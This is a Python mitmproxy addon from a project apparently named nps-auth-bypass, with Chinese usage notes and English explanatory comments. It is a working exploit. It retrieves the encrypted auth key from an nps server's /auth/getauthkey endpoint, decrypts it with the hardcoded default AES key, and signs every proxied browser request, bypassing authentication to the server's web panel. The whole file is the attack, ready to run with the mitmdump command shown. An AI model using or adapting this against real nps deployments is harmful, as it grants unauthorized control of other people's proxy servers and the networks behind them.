# -*- encoding:utf-8 -*-
"""
@使用方法:
mitmdump -s main.py -p 8000 --mode reverse:http://x.x.x.x:x/
浏览器访问 http://127.0.0.1:8000/
@项目地址:
https://github.com/carr0t2/nps-auth-bypass
"""
import time
import hashlib
import mitmproxy.http
import mitmproxy.addonmanager
import requests
from Crypto.Cipher import AES
class NpsHack:
    """mitmproxy addon that attaches an nps web-API auth signature to every
    proxied request.

    Run through ``mitmdump -s main.py --mode reverse:<nps-server>`` (see the
    module docstring). ``load`` tries to recover the server's
    ``config_auth_key`` from the ``/auth/getauthkey`` endpoint, and
    ``request`` signs each forwarded request with it.
    """

    def __init__(self):
        # Empty by default; if a known value exists it can be set here by
        # hand (original comment). Overwritten by load() when recovery works.
        self.config_auth_key = ''

    @staticmethod
    def md5(s: str) -> str:
        """Return the hex MD5 digest of *s* (encoded with str.encode's default)."""
        m = hashlib.md5()
        m.update(s.encode())
        return m.hexdigest()

    def load(self, loader: mitmproxy.addonmanager.Loader):
        """Addon load hook: fetch and decrypt the server's config_auth_key.

        Original comment: this covers deployments that changed ``auth_key``
        in their config but left ``auth_crypt_key`` at its default; the API
        details are in the nps docs linked below. Any failure on the way
        (network, JSON shape, hex decoding, decryption, padding) is swallowed
        and ``self.config_auth_key`` keeps its previous value.
        """
        try:
            # https://github.com/ehang-io/nps/blob/c9a4d8285b30c3c140782fc660bfc3d6961262ed/docs/api.md#%E8%8E%B7%E5%8F%96%E6%9C%8D%E5%8A%A1%E7%AB%AFauthkey
            # The reverse-proxy target comes from ``--mode reverse:<url>``:
            # drop the 8-character "reverse:" prefix and any trailing slash.
            url = loader.master.options.mode[8:].rstrip('/')
            burp0_url = url + '/auth/getauthkey'
            r = requests.get(burp0_url, timeout=2)
            crypt_auth_key = r.json()['crypt_auth_key']
            # Presumably nps's default auth_crypt_key (the original names it
            # the default key); it doubles as the CBC IV. A server with a
            # non-default auth_crypt_key does not decrypt here, which is the
            # configuration change that closes this path.
            defaul_aes_key = b'1234567812345678'
            b_key = bytes.fromhex(crypt_auth_key)
            enc = AES.new(key=defaul_aes_key, mode=AES.MODE_CBC, iv=defaul_aes_key)
            config_auth_key = enc.decrypt(b_key).decode()
            # Strip block padding (PKCS#7-style: the last byte is the pad length).
            config_auth_key = config_auth_key[0:-ord(config_auth_key[-1])]
            self.config_auth_key = config_auth_key
            print('成功获取config_auth_key', config_auth_key.encode())
        except Exception as e:
            # print(e)
            pass

    def request(self, flow: mitmproxy.http.HTTPFlow):
        """Request hook: add ``auth_key`` and ``timestamp`` query parameters.

        ``auth_key`` is md5(config_auth_key + current unix time in seconds),
        which the nps API check presumably compares against (see the API doc
        linked in ``load``). Existing values of both parameters are replaced
        via ``set_all``.
        """
        r = flow.request
        now_timestamp = str(int(time.time()))
        auth_key = self.md5(self.config_auth_key + now_timestamp)
        r.query.set_all('auth_key', [auth_key])
        r.query.set_all('timestamp', [now_timestamp])
        # Rebuild the request from its parts; the original gives no reason,
        # presumably so the modified query is re-serialised into the URL.
        flow.request = flow.request.make(
            method=r.method,
            url=r.url,
            content=r.raw_content,
            headers=r.headers
        )
# mitmproxy addon registration: mitmdump (-s main.py) reads this list and
# invokes NpsHack.load() / NpsHack.request() as its hooks.
addons = [NpsHack()]